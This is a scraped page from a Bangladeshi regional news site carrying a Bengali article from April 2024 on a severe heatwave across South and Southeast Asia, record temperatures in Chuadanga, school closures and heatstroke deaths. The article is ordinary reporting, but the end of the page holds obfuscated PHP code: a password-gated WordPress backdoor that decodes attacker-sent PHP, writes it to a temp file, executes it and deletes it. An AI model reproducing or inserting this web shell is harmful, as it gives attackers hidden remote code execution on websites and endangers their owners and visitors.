• বৃহস্পতিবার, ২০ জুন ২০২৪, ১২:১০ পূর্বাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

প্রচন্ড খড়তাপে পুড়ছে প্রাণী,মরছে মানুষ,*ছড়িয়ে পড়ছে রোগব্যাধী *বিশুদ্ধ পানির সংকট

ফরিদুল মোস্তফা খান:
আপডেট : মঙ্গলবার, ৩০ এপ্রিল, ২০২৪

প্রচন্ড খড়তাপে পুড়ছে মানুষ।

ভূগর্ভস্থ পানির স্তর নিচে নেমে যাওয়ায় দেখা দিয়েছে বিশুদ্ধ পানির সংকট।

গরমে প্রাণ বের হওয়ার উপক্রম হয়ে দাড়িয়েছে প্রাণী জগতে।

একই সাথে বাড়ছে মৌসুমি রোগের প্রাদুর্ভাব।

কক্সবাজার জেলার ৯ উপজেলার হাসপাতাল ক্লিনিক, ডায়াগোনস্টিক সেন্টার গুলোতে বাড়ছে গরম জনিত রোগীর সংখ্যা।

ডায়েরিয়া,জ্বর,সর্দি, কাশি, চর্ম রোগ সহ ছড়িয়ে পড়ছে বিভিন্ন রোগব্যধি।

জানাগেছে,দক্ষিণ ও দক্ষিণপূর্ব এশিয়ার বেশ কয়েকটি দেশে তীব্র তাপপ্রবাহে কারণে বিরাজ করছে এই অবস্থা ।

এতে করে,স্বাভাবিক কাজে ব্যাঘাত ঘটছে।

ফলে বন্ধ কর দেওয়া হচ্ছে শিক্ষাপ্রতিষ্ঠান।

জলবায়ু পরিবর্তন ও এল নিনোর প্রভাবে তাপপ্রবাহ ধীরে ধীরে বিপজ্জনক হয়ে উঠছে, যা নীরব ঘাতকে পরিণত হচ্ছে। সূত্র: এএফপি

 মিয়ানমার, ভারত, ফিলিপাইন, ভিয়েতনাম, কম্বোডিয়া এবং বাংলাদেশে এই তাপপ্রবাহ চলছে । সব দেশেই তাপমাত্রা ৪০ ডিগ্রি সেলসিয়াস ছাড়িয়ে গেছে। মিয়ানমারে রোববার তাপমাত্রা ওঠে ৪৮ দশমিক ২ ডিগ্রি সেলিয়াসে, যা দেশটির ৫৬ বছরের ইতিহাসে সর্বোচ্চ। একই দিনে দেশটির বাণিজ্যিক শহর ইয়াঙ্গুনের তাপমাত্রা ছিল ৪০ ডিগ্রি আর মান্দালয়ে ছিল ৪৪ ডিগ্রি সেলসিয়াস।

 তাপপ্রবাহের কারণে ইয়াঙ্গুনে মোটরসাইকেল ও স্কুটার চলাচল নিষিদ্ধ করা হয়। চাউক শহরের একজন বাসিন্দা বলেন, ‘এখানে প্রচণ্ড গরম। আমরা ঘর থেকে বের হচ্ছি না। এ অবস্থায় আমাদের আর কিছু করার নেই।’

 মিয়ানমারের আবহাওয়া পর্যবেক্ষকদের তথ্য মতে, এপ্রিলে সাধারণত যে গড় তাপমাত্রা থাকে, তার চেয়ে গত বৃহস্পতিবারের তাপমাত্রা ৩-৪ ডিগ্রি সেলসিয়াস বেশি ছিল।

 বৈজ্ঞানিক গবেষণা বলছে, জলবায়ু পরিবর্তনের কারণে তাপপ্রবাহ দীর্ঘস্থায়ী, তীব্র ও বারবার হতে পারে। জাতিসংঘের আবহাওয়া ও জলবায়ুবিষয়ক সংস্থা জানিয়েছে, গত বছর বৈশ্বিক তাপমাত্রা রেকর্ড পরিমাণ বেড়েছে। এর মধ্যে বিশেষ করে এশিয়া দ্রুতগতিতে উষ্ণ হয়ে উঠছে।

[৭] গরমে শ্রমিকদের উৎপাদনশীলতা কমে, কৃষি ক্ষতিগ্রস্ত হয়, বিদ্যুতের ওপর চাপ পড়ে। পরিসংখ্যানে এসব বিষয়ে সঠিকভাবে প্রতিফলিত হয় না। প্রচণ্ড গরম ধীরে ধীরে বড় ধরনের নীরব ঘাতক হয়ে উঠছে। কম্বোডিয়ার পানি ও আবহাওয়াবিষয়ক মন্ত্রণালয় দেশবাসীকে সতর্ক করে দিয়ে বলেছে, সামনের দিনগুলোতে দেশের কোনো কোনো অঞ্চলে তাপমাত্রা ৪৩ ডিগ্রি সেলসিয়াসে উঠতে পারে।

 ভিয়েতনামে তীব্র তাপপ্রবাহের পূর্বাভাস দিয়ে দেশটির সংশ্লিষ্ট দপ্তর জানিয়েছে, দেশের উত্তরাঞ্চলে তাপমাত্রা ৪১ ডিগ্রি সেলসিয়াসে উঠতে পারে। পুরো এপ্রিলে প্রচণ্ড গরম থাকতে পারে উল্লেখ করে পূর্বাভাসে বলা হয়েছে, আগামী মাসে তাপমাত্রা কমে আসতে পারে।দক্ষিণ এশিয়ার অন্যতম বড় দেশ ভারতের বিভিন্ন রাজ্য তীব্র তাপপ্রবাহের মধ্যে রয়েছে। দেশটির আবহাওয়া দপ্তর গত শনিবার জানায়, এই পরিস্থিতিতে কোনো কোনো অঞ্চলে তাপমাত্রা ৪৪ ডিগ্রি সেলসিয়াসে উঠতে পারে।

এদিকে,দেশে এবারের মৌসুমের সর্বোচ্চ তাপমাত্রা রেকর্ড করা হয়েছে সোমবার। আবহাওয়া অধিদপ্তর জানিয়েছে, চুয়াডাঙ্গায় এদিন সর্বোচ্চ তাপমাত্রা উঠেছে ৪৩ ডিগ্রি সেলসিয়াস।

 এর আগে, ১৯৯৫ সালের ১ মে দেশটির সর্বোচ্চ তাপমাত্রা রেকর্ড করা হয়েছিল ৪৩.৫ ডিগ্রি সেলসিয়াস। ওই বছরের ২৫ এপ্রিল তাপমাত্রা রেকর্ড করা হয় ৪৩ ডিগ্রি।

 

আবহাওয়াবিদ আবুল কালাম মল্লিক বিবিসি বাংলাকে বলেন, ওই দুটি শীর্ষ তাপমাত্রাও পাওয়া গিয়েছিল চুয়াডাঙ্গাতেই।

এদিকে, তীব্র তাপপ্রবাহের কারণে বৃহস্পতিবার পর্যন্ত প্রাথমিক, মাধ্যমিক স্কুল ও মাদরাসা বন্ধের নির্দেশ দিয়েছেন উচ্চ আদালত। আদালতের নির্দেশনায় শিক্ষা প্রতিষ্ঠান বন্ধের আলাদা ঘোষণা আসে সংশ্লিষ্ট দফতরগুলোর তরফে।

 সোমবার হিট স্ট্রোকে নরসিংদী, পাবনা, ঠাঁকুরগাঁও ও কক্সবাজারে নারীসহ ৪ জনের মৃত্যু হয়েছে।

আবহাওয়া অধিদপ্তরের আবহাওয়াবিদ শাহানাজ সুলতানা বলেন, সোমবার দুপুরে দেশের সর্বোচ্চ ৪৩ ডিগ্রি তাপমাত্রা চুয়াডাঙ্গায়। আর ঢাকায় ৪০ দশমিক তিন ডিগ্রি সেলসিয়াস তাপমাত্রা রেকর্ড করা হয়েছে।

তাপমাত্রার বিষয়ে বলা হয়, সারা দেশে দিনের তাপমাত্রা সামান্য বৃদ্ধি পেতে পারে এবং রাতের তাপমাত্রা প্রায় অপরিবর্তিত থাকতে পারে। জলীয়বাষ্পের আধিক্যের কারণে অস্বস্তি ভাব বিরাজমান থাকতে পারে।

নরসিংদীর পলাশের ঘোড়াশালে প্রচণ্ড তাপদাহে ধান কাটার সময় গরমে অসুস্থ হয়ে ‘হিট স্ট্রোকে’ মানিক মিয়া নামে এক দিনমজুরের মৃত্যু হয়েছে। পলাশ উপজেলা স্বাস্থ্য কমপ্লেক্সের মেডিকেল অফিসার পলাশ দাস বলেন, ধান কাটার সময় গরমে অসুস্থ হয়ে মানিক মিয়া মারা যান।

পাবনার চাটমোহরে অতিরিক্ত গরমে অসুস্থ হয়ে এক কৃষকের মৃত্যু হয়েছে। দুপুরে উপজেলার ছাইকোলা বাজার (পূর্বপাড়া) এলাকায় এ ঘটনা ঘটে। স্বজনেরা জানিয়েছেন, দুপুরে স্থানীয় মাঠে জমি দেখে বাড়িতে ফেরার পর অতিরিক্ত গরমে অসুস্থ বোধ করেন আবু জাফর। বাড়ির লোকজন তার মাথায় পানি ঢালতে থাকেন। একপর্যায়ে অচেতন হয়ে পড়লে স্থানীয় পল্লিচিকিৎসককে ডেকে আনা হলে আবু জাফরকে মৃত ঘোষণা করেন।

  ঠাকুরগাঁওয়ের হরিপুরে রাস্তা সংস্কারের কাজ করার সময় প্রচণ্ড তাবদাহে অসুস্থ হয়ে লতিফা বেগম নামে এক নারী শ্রমিকের মৃত্যু হয়েছে। উপজেলা স্বাস্থ্য ও পরিবার পরিকল্পনা কর্মকর্তা ডা. মো. শামীমুজ্জামান বলেন, ধারণা করছি অতিরিক্ত গরমে হিট স্ট্রোকজনিত কারণে ওই নারী শ্রমিকের মৃত্যু হয়েছে।

 কক্সবাজারের পেকুয়ায় হিটস্ট্রোকে মো. কালু (৫০) নামে এক দিনমজুরের মৃত্যু হয়েছে। সোমবার পেকুয়া সদর ইউনিয়নের ৭ নং ওয়ার্ডের উত্তর মেহেরনামা তেলিয়াকাটা এলাকায়।

এ বিষয়ে উপজেলা স্বাস্থ্য ও পরিবার পরিকল্পনা কর্মকর্তা ডা: মুজিবুর রহমান বলেন, মৃত দিনমজুর কালুকে হাসপাতালে আনার আগেই তিনি মারা যান। তবে তার স্বজনদের বক্তব্য শুনে এটা হিটস্ট্রোকে মৃত্যু হয়েছে বলে মনে হচ্ছে। [১৪] চুয়াডাঙ্গা প্রতিনিধি প্রশান্ত বিশ্বাস জানান, তাবদাহে হাঁপিয়ে উঠেছে চুয়াডাঙ্গার মানুষ। ব্যাহত হচ্ছে স্বাভাবিক জীবনযাত্রা। জেলা সদর হাসপাতালে বেড়েছে ডায়রিয়া ও শিশু রোগীর সংখ্যা। ওয়ার্ডের মেঝেতে রেখে চলছে চিকিৎসা। বহির্বিভাগেও প্রতিদিন গড়ে গরমজনিত কারণে ৪০০-৫০০ শিশু রোগী চিকিৎসা নিচ্ছেন বলে জানিয়েছেন চিকিৎসকরা।

 এদিকে বৃহস্পতিবার চট্টগ্রাম, সিলেট, ময়মনসিংহ ও ঢাকা বিভাগসহ দেশের কিছু কিছু জায়গায় বৃষ্টি ও বজ্রসহ বৃষ্টির সম্ভাবনা রয়েছে বলে জানিয়েছে আবহাওয়া অধিদপ্তর।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বৃহস্পতিবার (রাত ১২:১০)
  • ২০শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৪ই জিলহজ, ১৪৪৫ হিজরি
  • ৬ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}